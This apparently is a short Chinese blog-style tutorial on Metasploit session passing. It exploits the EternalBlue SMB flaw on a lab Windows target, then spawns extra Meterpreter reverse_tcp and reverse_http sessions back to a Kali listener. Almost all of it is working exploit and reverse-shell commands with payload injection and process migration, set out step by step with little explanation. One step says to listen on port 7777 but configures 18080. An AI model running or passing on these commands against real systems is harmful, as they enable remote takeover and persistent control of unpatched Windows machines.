MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit

首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ip

set autorunscript post/windows/manage/migrate name=services.exe
set payload windows/x64/meterpreter/reverse_tcp
set lport 5577
set lhost 192.168.50.130
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.50.146
set rport 445
exploit -j -z

接下来在另外的msf里,做好监听3333:

handler -H 192.168.50.130 -P 3333 -p windows/meterpreter/reverse_tcp

然后在上面的meterpreter 里:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.130
set lport 3333
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

这样就可以退出使用ms17_010拿下的session了

如上使用的是reverse_tcp,其实reverse_http,也是一样的可以:

在另外的msf里,做好监听7777:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

然后在旧session里派生:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.130
set lport 18080
set DisablePayloadHandler True
set PrependMigrate True
set session 1
run

run后大概需要15-20秒才能完全建立新session.

你可能感兴趣的:(安全)